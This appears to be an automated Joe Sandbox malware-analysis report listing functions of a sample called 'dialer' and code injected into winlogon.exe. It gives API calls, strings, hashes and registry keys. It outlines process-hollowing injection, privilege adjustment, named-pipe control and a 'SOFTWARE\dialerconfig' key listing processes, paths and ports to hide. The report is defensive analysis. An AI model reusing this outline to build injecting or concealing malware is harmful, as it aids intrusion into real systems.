M, xrefs: 0000000140002C6E

Memory Dump Source

Source File: 0000002E.00000002.2230504837.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000002E.00000002.2230413102.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002E.00000002.2230668295.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002E.00000002.2230717296.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_140000000_dialer.jbxd

Similarity

API ID: NamedPipe$DescriptorFileInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesLocalReadWrite
String ID: M$\\.\pipe\dialerchildproc64
API String ID: 2203880229-3489460547
Opcode ID: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
Instruction ID: 6dc3dc8c0bd617ca7cbe615ebfcb02ed857a87361961821bc60a1768ee808972
Opcode Fuzzy Hash: cb78decc689e444f168c8ecd1fa7ab696948f8a3ff5b9be1a13ae3c23ba91d6c
Instruction Fuzzy Hash: C01139B1218A8492F716DB22F8047EE6764A78DBE0F444225BB66036F4DF7CC548C700

Function 00000001400021D0 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 36
sleeppipefileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 0000000140001B54: AllocateAndInitializeSid.ADVAPI32 ref: 0000000140001BA3
Part of subcall function 0000000140001B54: SetEntriesInAclW.ADVAPI32 ref: 0000000140001BEB
Part of subcall function 0000000140001B54: LocalAlloc.KERNEL32 ref: 0000000140001BFB
Part of subcall function 0000000140001B54: InitializeSecurityDescriptor.ADVAPI32 ref: 0000000140001C0F
Part of subcall function 0000000140001B54: SetSecurityDescriptorDacl.ADVAPI32 ref: 0000000140001C26
Part of subcall function 0000000140001B54: CreateNamedPipeW.KERNELBASE ref: 0000000140001C67

Sleep.KERNEL32 ref: 00000001400021F5
ConnectNamedPipe.KERNELBASE ref: 0000000140002202
ReadFile.KERNEL32 ref: 0000000140002225
Sleep.KERNEL32 ref: 0000000140002246
DisconnectNamedPipe.KERNEL32 ref: 000000014000224F

Strings

\\.\pipe\dialercontrol_redirect64, xrefs: 00000001400021DD

Memory Dump Source

Source File: 0000002E.00000002.2230504837.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000002E.00000002.2230413102.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002E.00000002.2230668295.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002E.00000002.2230717296.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_140000000_dialer.jbxd

Similarity

API ID: NamedPipe$DescriptorInitializeSecuritySleep$AllocAllocateConnectCreateDaclDisconnectEntriesFileLocalRead
String ID: \\.\pipe\dialercontrol_redirect64
API String ID: 2071455217-3440882674
Opcode ID: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
Instruction ID: d66e41e89491d3fe39127ed5f8ff24c46c9ecc4af95d447005e5476a51c55f6d
Opcode Fuzzy Hash: 0eadeefac485689016ee7cb8901f6413b977b23d4cbf2cacf1e5db6f82192be8
Instruction Fuzzy Hash: 42014BB1204A40A2EA17EB63F8443E9B365A79DBE0F144235FB66476F4DF78C488C700

Function 0000000140002B38 Relevance: 9.1, APIs: 6, Instructions: 58
memorysleepCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 0000000140002B53
HeapAlloc.KERNEL32 ref: 0000000140002B67
GetProcessHeap.KERNEL32 ref: 0000000140002B70
HeapAlloc.KERNEL32 ref: 0000000140002B7E
K32EnumProcesses.KERNEL32 ref: 0000000140002B99
Sleep.KERNEL32 ref: 0000000140002BEE

Memory Dump Source

Source File: 0000002E.00000002.2230504837.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000002E.00000002.2230413102.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002E.00000002.2230668295.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002E.00000002.2230717296.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_140000000_dialer.jbxd

Similarity

API ID: Heap$AllocProcess$EnumProcessesSleep
String ID:
API String ID: 3676546796-0
Opcode ID: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
Instruction ID: 9c67988e037e7d22bad9650836966df18df348572cafe7f0e6f30b42da554bff
Opcode Fuzzy Hash: 8f13c2487408d17cabd0d6010e800d760c40d8336c2ba260ca50616313c4bb70
Instruction Fuzzy Hash: 3A115CB26006518AE72ACF17F85579A77A6F78DBC1F154028EB4607B68CF39D881CB40

Function 00000001400017EC Relevance: 9.1, APIs: 6, Instructions: 55
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001801
HeapAlloc.KERNEL32(?,00000000,?,000000014000238B,?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140001812

Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000150B
Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000151E
Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000152C
Part of subcall function 00000001400014D8: HeapAlloc.KERNEL32 ref: 000000014000153D
Part of subcall function 00000001400014D8: K32EnumProcesses.KERNEL32 ref: 0000000140001557
Part of subcall function 00000001400014D8: OpenProcess.KERNEL32 ref: 0000000140001585
Part of subcall function 00000001400014D8: K32EnumProcessModules.KERNEL32 ref: 00000001400015AA
Part of subcall function 00000001400014D8: ReadProcessMemory.KERNELBASE ref: 00000001400015E1
Part of subcall function 00000001400014D8: CloseHandle.KERNELBASE ref: 000000014000161D
Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 000000014000162F
Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 000000014000163D
Part of subcall function 00000001400014D8: GetProcessHeap.KERNEL32 ref: 0000000140001643
Part of subcall function 00000001400014D8: RtlFreeHeap.NTDLL ref: 0000000140001651

OpenProcess.KERNEL32 ref: 0000000140001859
TerminateProcess.KERNEL32 ref: 000000014000186C
CloseHandle.KERNEL32 ref: 0000000140001875
GetProcessHeap.KERNEL32 ref: 0000000140001885

Memory Dump Source

Source File: 0000002E.00000002.2230504837.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000002E.00000002.2230413102.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002E.00000002.2230668295.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002E.00000002.2230717296.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_140000000_dialer.jbxd

Similarity

API ID: HeapProcess$Alloc$CloseEnumFreeHandleOpen$MemoryModulesProcessesReadTerminate
String ID:
API String ID: 1323846700-0
Opcode ID: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
Instruction ID: e8e8f15008253283e0d5a10c8ea57e573901c1344bffe788f1ea91b5e390c365
Opcode Fuzzy Hash: 292de27f87d02887c134cd68883e15ba7f6a186f84d3e8f804eb1f1d2b0452f5
Instruction Fuzzy Hash: C8115BB1B05A4186FB1ADF27F8443D966A6ABCDBC4F188038EF09037B5DE38C5868700

Function 00000001400018AC Relevance: 4.5, APIs: 3, Instructions: 30
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

OpenProcess.KERNEL32(?,?,?,000000014000110E), ref: 00000001400018CA
IsWow64Process.KERNEL32(?,?,?,000000014000110E), ref: 00000001400018E0
CloseHandle.KERNELBASE(?,?,?,000000014000110E), ref: 00000001400018FB

Memory Dump Source

Source File: 0000002E.00000002.2230504837.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000002E.00000002.2230413102.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002E.00000002.2230668295.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002E.00000002.2230717296.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_140000000_dialer.jbxd

Similarity

API ID: Process$CloseHandleOpenWow64
String ID:
API String ID: 10462204-0
Opcode ID: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
Instruction ID: a864651f2e5c17a125c4a55b2f5ca9b47fcd1256b8d640ad9fe9232b2a40a049
Opcode Fuzzy Hash: 6d646fbe37808f9b584e9cbd293ea6613d1d1a58a609fbda32c726050c0f507a
Instruction Fuzzy Hash: 77F01D7170578192EB56CF17B584399A665E78CBC0F449039EB8943768DF39C4858700

Function 0000000140002258 Relevance: 1.5, APIs: 1, Instructions: 4
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000228F
Part of subcall function 000000014000226C: OpenProcess.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000229F
Part of subcall function 000000014000226C: OpenProcessToken.ADVAPI32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 00000001400022B9
Part of subcall function 000000014000226C: LookupPrivilegeValueW.ADVAPI32 ref: 00000001400022D0
Part of subcall function 000000014000226C: AdjustTokenPrivileges.KERNELBASE ref: 0000000140002308
Part of subcall function 000000014000226C: GetLastError.KERNEL32 ref: 0000000140002312
Part of subcall function 000000014000226C: CloseHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000231B
Part of subcall function 000000014000226C: FindResourceExA.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000232F
Part of subcall function 000000014000226C: SizeofResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002346
Part of subcall function 000000014000226C: LoadResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000235F
Part of subcall function 000000014000226C: LockResource.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 0000000140002371
Part of subcall function 000000014000226C: GetCurrentProcessId.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,0000000140002261), ref: 000000014000237E
Part of subcall function 000000014000226C: RegCreateKeyExW.KERNELBASE ref: 00000001400023BE
Part of subcall function 000000014000226C: ConvertStringSecurityDescriptorToSecurityDescriptorW.ADVAPI32 ref: 00000001400023E5
Part of subcall function 000000014000226C: RegSetKeySecurity.KERNELBASE ref: 00000001400023FE
Part of subcall function 000000014000226C: LocalFree.KERNEL32 ref: 0000000140002408

ExitProcess.KERNEL32 ref: 0000000140002263

Memory Dump Source

Source File: 0000002E.00000002.2230504837.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000002E.00000002.2230413102.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002E.00000002.2230668295.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002E.00000002.2230717296.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_140000000_dialer.jbxd

Similarity

API ID: Process$Resource$Security$CurrentDescriptorOpenToken$AdjustCloseConvertCreateErrorExitFindFreeHandleLastLoadLocalLockLookupPrivilegePrivilegesSizeofStringValue
String ID:
API String ID: 3836936051-0
Opcode ID: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
Instruction ID: 542f07df19912b07f19d0c3647b83d0aa38d4f887fbb8c9b09a79fc57a6ac5cd
Opcode Fuzzy Hash: c7c2c95b7158c919dbdf86fa47620a0d13b0befc2d5611a3b20bc48f104c5c5f
Instruction Fuzzy Hash: 84A002B1F1794096FA0BB7F7785E3DC21656B9CB82F500415B242472B2DD3C44558716

Non-executed Functions

Function 0000000140002560 Relevance: 47.5, APIs: 24, Strings: 3, Instructions: 296
memoryregistryfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ReadFile.KERNEL32 ref: 00000001400025E7

Part of subcall function 00000001400018AC: OpenProcess.KERNEL32(?,?,?,000000014000110E), ref: 00000001400018CA
Part of subcall function 00000001400018AC: IsWow64Process.KERNEL32(?,?,?,000000014000110E), ref: 00000001400018E0
Part of subcall function 00000001400018AC: CloseHandle.KERNELBASE(?,?,?,000000014000110E), ref: 00000001400018FB

Part of subcall function 00000001400010C0: OpenProcess.KERNEL32 ref: 000000014000112C
Part of subcall function 00000001400010C0: OpenProcess.KERNEL32 ref: 000000014000114B
Part of subcall function 00000001400010C0: K32GetModuleFileNameExW.KERNEL32 ref: 0000000140001170
Part of subcall function 00000001400010C0: PathFindFileNameW.SHLWAPI ref: 000000014000117E
Part of subcall function 00000001400010C0: lstrlenW.KERNEL32 ref: 000000014000118A
Part of subcall function 00000001400010C0: StrCpyW.SHLWAPI ref: 00000001400011A1
Part of subcall function 00000001400010C0: CloseHandle.KERNEL32 ref: 00000001400011AD
Part of subcall function 00000001400010C0: StrCmpIW.SHLWAPI ref: 00000001400011E2
Part of subcall function 00000001400010C0: NtQueryInformationProcess.NTDLL ref: 0000000140001216
Part of subcall function 00000001400010C0: OpenProcessToken.ADVAPI32 ref: 0000000140001240

RegOpenKeyExW.ADVAPI32 ref: 0000000140002683
RegDeleteValueW.ADVAPI32 ref: 000000014000269B
ExitProcess.KERNEL32 ref: 00000001400026BF
GetProcessHeap.KERNEL32 ref: 00000001400026C6
HeapAlloc.KERNEL32 ref: 00000001400026D9
K32EnumProcesses.KERNEL32 ref: 00000001400026F6
ExitProcess.KERNEL32 ref: 0000000140002796

Strings

open, xrefs: 0000000140002960
SOFTWARE, xrefs: 0000000140002675
dialerstager, xrefs: 0000000140002694

Memory Dump Source

Source File: 0000002E.00000002.2230504837.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000002E.00000002.2230413102.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002E.00000002.2230668295.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002E.00000002.2230717296.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_140000000_dialer.jbxd

Similarity

API ID: Process$Open$File$CloseExitHandleHeapName$AllocDeleteEnumFindInformationModulePathProcessesQueryReadTokenValueWow64lstrlen
String ID: SOFTWARE$dialerstager$open
API String ID: 3276259517-3931493855
Opcode ID: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
Instruction ID: ae65b9042581f7dc9e2ee581e3d1b52dcddb088aa692a5b8ad70e1a65f9de3a1
Opcode Fuzzy Hash: 3c799c4d4b717077f969037001029e391788172767dfb7e3a3364a0c1608c947
Instruction Fuzzy Hash: 91D14DB13046818BEB7BDF26B8143E92269F74DBC8F404125BB4A47AB9DE78C605C741

Function 0000000140001C88 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 154
injectionthreadmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNEL32 ref: 0000000140001D1D
VirtualAllocEx.KERNEL32 ref: 0000000140001D4C
WriteProcessMemory.KERNEL32 ref: 0000000140001D73
WriteProcessMemory.KERNEL32 ref: 0000000140001DB2
VirtualAlloc.KERNEL32 ref: 0000000140001DE3
GetThreadContext.KERNEL32 ref: 0000000140001DFF
WriteProcessMemory.KERNEL32 ref: 0000000140001E26
SetThreadContext.KERNEL32 ref: 0000000140001E44
ResumeThread.KERNEL32 ref: 0000000140001E52
OpenProcess.KERNEL32 ref: 0000000140001E6A
TerminateProcess.KERNEL32 ref: 0000000140001E7D

Strings

@, xrefs: 0000000140001D44

Memory Dump Source

Source File: 0000002E.00000002.2230504837.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000002E.00000002.2230413102.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002E.00000002.2230668295.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002E.00000002.2230717296.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_140000000_dialer.jbxd

Similarity

API ID: Process$MemoryThreadWrite$AllocContextVirtual$CreateOpenResumeTerminate
String ID: @
API String ID: 3462610200-2766056989
Opcode ID: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
Instruction ID: 5c16bc39e07cf5e776479c29415d8ab36f8b64b080a4e80c067f24e51f003d21
Opcode Fuzzy Hash: 9e87a73b0eb69cfa39acb8f7a19e25e40ab225c9e7017233cfa86b54780bd9da
Instruction Fuzzy Hash: B55122B2700A808AEB52CF66E8447DE77A5FB88BD8F054125EF4997B68DF38C855C700

Function 00000001400019C4 Relevance: 17.6, APIs: 9, Strings: 1, Instructions: 102
memorycomCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysAllocString.OLEAUT32 ref: 00000001400019E6
SysAllocString.OLEAUT32 ref: 00000001400019F6
CoInitializeEx.OLE32 ref: 0000000140001A03
CoInitializeSecurity.OLE32 ref: 0000000140001A3A
CoCreateInstance.OLE32 ref: 0000000140001A7A
VariantInit.OLEAUT32 ref: 0000000140001A8C
CoUninitialize.OLE32 ref: 0000000140001B26
SysFreeString.OLEAUT32 ref: 0000000140001B2F
SysFreeString.OLEAUT32 ref: 0000000140001B38

Strings

dialersvc64, xrefs: 00000001400019DD

Memory Dump Source

Source File: 0000002E.00000002.2230504837.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000002E.00000002.2230413102.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002E.00000002.2230668295.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002E.00000002.2230717296.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_140000000_dialer.jbxd

Similarity

API ID: String$AllocFreeInitialize$CreateInitInstanceSecurityUninitializeVariant
String ID: dialersvc64
API String ID: 4184240511-3881820561
Opcode ID: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
Instruction ID: f04b9e4fe08d72b668f3c34f73b3c63bb96ebc933f76805d9c48aa5d26f439e8
Opcode Fuzzy Hash: c5773a1fcac1982b1b845e0e6ec66c21fb3e8571a559d525fc626bf24240b323
Instruction Fuzzy Hash: 69415A72704A819AE712CF6AE8543DD73B5FB89B89F044125EF4E47A64DF38D149C300

Function 0000000140001000 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 37registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32 ref: 0000000140001034
RegDeleteKeyW.ADVAPI32 ref: 0000000140001045
RegEnumKeyExW.ADVAPI32 ref: 0000000140001082
RegCloseKey.ADVAPI32 ref: 0000000140001093
RegDeleteKeyExW.ADVAPI32 ref: 00000001400010B0

Strings

SOFTWARE\dialerconfig, xrefs: 0000000140001026, 000000014000109C

Memory Dump Source

Source File: 0000002E.00000002.2230504837.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000002E.00000002.2230413102.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002E.00000002.2230668295.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002E.00000002.2230717296.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_140000000_dialer.jbxd

Similarity

API ID: Delete$CloseEnumOpen
String ID: SOFTWARE\dialerconfig
API String ID: 3013565938-461861421
Opcode ID: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
Instruction ID: 8f4ace04a6ff3505bb025a84b088d585f414f6eddbaae7ea6d4a7c6b6057ac94
Opcode Fuzzy Hash: 771b17fd0f1a16041f26a54d46b0ec7916154baef178d5f18a2b3dcc43556395
Instruction Fuzzy Hash: 2F1186B2714A8486E762CF26F8557E92378F78C7D8F404215A74D0BAA8DF7CC248CB54

Function 0000000140002A90 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 42fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNEL32 ref: 0000000140002ACB
WriteFile.KERNEL32 ref: 0000000140002AF3
WriteFile.KERNEL32 ref: 0000000140002B16
CloseHandle.KERNEL32 ref: 0000000140002B1F

Strings

\\.\pipe\dialercontrol_redirect64, xrefs: 0000000140002AA8

Memory Dump Source

Source File: 0000002E.00000002.2230504837.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000002E.00000002.2230413102.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002E.00000002.2230668295.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002E.00000002.2230717296.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_140000000_dialer.jbxd

Similarity

API ID: File$Write$CloseCreateHandle
String ID: \\.\pipe\dialercontrol_redirect64
API String ID: 148219782-3440882674
Opcode ID: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
Instruction ID: c657f3a7a6ba8077c0f3fca19c98ae9a251d12aa6ce49f65425284bb78429f7a
Opcode Fuzzy Hash: 883fb3da148993cb75da2269ecc4fc0d73b62e41bf5aa7103fd26e0bcaccd1b9
Instruction Fuzzy Hash: AE1139B6720B5082EB16CF16F818399A764F78DFE4F544215AB6907BA4CF78C549CB40

Function 0000000140001914 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 14libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(?,?,00000000,0000000140002138), ref: 0000000140001924
GetProcAddress.KERNEL32(?,?,00000000,0000000140002138), ref: 0000000140001937

Strings

ntdll.dll, xrefs: 000000014000191A

Memory Dump Source

Source File: 0000002E.00000002.2230504837.0000000140001000.00000020.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true

Associated: 0000002E.00000002.2230413102.0000000140000000.00000004.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002E.00000002.2230668295.0000000140003000.00000002.00000001.00020000.00000000.sdmpDownload File
Associated: 0000002E.00000002.2230717296.0000000140006000.00000002.00000001.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_46_2_140000000_dialer.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: ntdll.dll
API String ID: 1646373207-2227199552
Opcode ID: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
Instruction ID: 7108e587e86fbdef38877cdd133235ae9a077454219746bc209a409130a8dfa8
Opcode Fuzzy Hash: 91777f2b0607ee1fe6466092eca8f752b6e1633f4feaae27b681225476bf4cba
Instruction Fuzzy Hash: 5BD0C9F471260582EE1BDBA378643E552996B5CBC5F884020AE164B360DA38C1998600

Analysis Process: winlogon.exePID: 564, Parent PID: 7504COMMON

Execution Graph

Execution Coverage:	1.7%
Dynamic/Decrypted Code Coverage:	95.6%
Signature Coverage:	0%
Total number of Nodes:	135
Total number of Limit Nodes:	16

Executed Functions

Function 000001E8589B1628 Relevance: 50.9, APIs: 20, Strings: 9, Instructions: 157
registrymemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetProcessHeap.KERNEL32 ref: 000001E8589B1633
HeapAlloc.KERNEL32 ref: 000001E8589B1642

Part of subcall function 000001E8589B1268: GetProcessHeap.KERNEL32 ref: 000001E8589B126E
Part of subcall function 000001E8589B1268: HeapAlloc.KERNEL32 ref: 000001E8589B127D
Part of subcall function 000001E8589B1268: GetProcessHeap.KERNEL32 ref: 000001E8589B1297
Part of subcall function 000001E8589B1268: HeapAlloc.KERNEL32 ref: 000001E8589B12A8

RegOpenKeyExW.ADVAPI32 ref: 000001E8589B16B2
RegOpenKeyExW.ADVAPI32 ref: 000001E8589B16DF
RegCloseKey.ADVAPI32 ref: 000001E8589B16F9
RegOpenKeyExW.ADVAPI32 ref: 000001E8589B1719
RegCloseKey.ADVAPI32 ref: 000001E8589B1734
RegOpenKeyExW.ADVAPI32 ref: 000001E8589B1754
RegCloseKey.ADVAPI32 ref: 000001E8589B176F
RegOpenKeyExW.ADVAPI32 ref: 000001E8589B178F
RegCloseKey.ADVAPI32 ref: 000001E8589B17AA
RegOpenKeyExW.ADVAPI32 ref: 000001E8589B17CA
RegCloseKey.ADVAPI32 ref: 000001E8589B17E5
RegOpenKeyExW.ADVAPI32 ref: 000001E8589B1805
RegCloseKey.ADVAPI32 ref: 000001E8589B1820
RegOpenKeyExW.ADVAPI32 ref: 000001E8589B1840
RegCloseKey.ADVAPI32 ref: 000001E8589B185B
RegOpenKeyExW.ADVAPI32 ref: 000001E8589B187B
RegCloseKey.ADVAPI32 ref: 000001E8589B1896
RegCloseKey.ADVAPI32 ref: 000001E8589B18A0

Part of subcall function 000001E8589B12BC: RegQueryInfoKeyW.ADVAPI32 ref: 000001E8589B1319
Part of subcall function 000001E8589B12BC: GetProcessHeap.KERNEL32 ref: 000001E8589B1327
Part of subcall function 000001E8589B12BC: HeapAlloc.KERNEL32 ref: 000001E8589B1338
Part of subcall function 000001E8589B12BC: RegEnumValueW.ADVAPI32 ref: 000001E8589B1397
Part of subcall function 000001E8589B12BC: GetProcessHeap.KERNEL32 ref: 000001E8589B13DF
Part of subcall function 000001E8589B12BC: HeapAlloc.KERNEL32 ref: 000001E8589B13ED
Part of subcall function 000001E8589B12BC: GetProcessHeap.KERNEL32 ref: 000001E8589B140A
Part of subcall function 000001E8589B12BC: HeapFree.KERNEL32 ref: 000001E8589B1418
Part of subcall function 000001E8589B12BC: lstrlenW.KERNEL32 ref: 000001E8589B1421
Part of subcall function 000001E8589B12BC: GetProcessHeap.KERNEL32 ref: 000001E8589B142F
Part of subcall function 000001E8589B12BC: HeapAlloc.KERNEL32 ref: 000001E8589B143D

Strings

udp, xrefs: 000001E8589B1874
startup, xrefs: 000001E8589B16D5
tcp_local, xrefs: 000001E8589B17FE
process_names, xrefs: 000001E8589B174D
paths, xrefs: 000001E8589B1788
tcp_remote, xrefs: 000001E8589B1839
service_names, xrefs: 000001E8589B17C3
pid, xrefs: 000001E8589B1712
SOFTWARE\dialerconfig, xrefs: 000001E8589B1692

Memory Dump Source

Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
String ID: SOFTWARE\dialerconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
API String ID: 106492572-2879589442
Opcode ID: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
Instruction ID: f0632be5b56d1d045c33e69aedb8194d200da67af966bba0f518d50e3ad8fab5
Opcode Fuzzy Hash: 29d8c56dd48d9a3b38e8b79419d4f3e68f34e96909367841420a970a2341c6d0
Instruction Fuzzy Hash: 9171D636324A90CAEB11AF66E8907DDB7A4FF84B89F401126DE4E57B69EF39C444C740

Function 000001E8589B3790 Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNEL32 ref: 000001E8589B379E
GetCurrentProcess.KERNEL32 ref: 000001E8589B37CC
VirtualProtectEx.KERNEL32 ref: 000001E8589B37EE
GetCurrentProcess.KERNEL32 ref: 000001E8589B3809
VirtualProtectEx.KERNEL32 ref: 000001E8589B382A

Strings

wr, xrefs: 000001E8589B37FF

Memory Dump Source

Source File: 00000035.00000002.3352252011.000001E8589B0000.00000040.00000001.00020000.00000000.sdmp, Offset: 000001E8589B0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_53_2_1e8589b0000_winlogon.jbxd

Similarity

API ID: CurrentProcessProtectVirtual$HandleModule
String ID: wr
API String ID: 1092925422-2678910430
Opcode ID: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
Instruction ID: 5c25a885d6fb7882426ca4c2d651152bb887428ee6332336122a0b4e2170aac2
Opcode Fuzzy Hash: d5ed198cecc284837a9554765ab7ffb778fa62629811cf0fe5ebc999f83bf42b
Instruction Fuzzy Hash: 51112A367287C1C6EB159B22E4043ADB7A0FB48B86F44003ADE8D07754EF2EC505C704

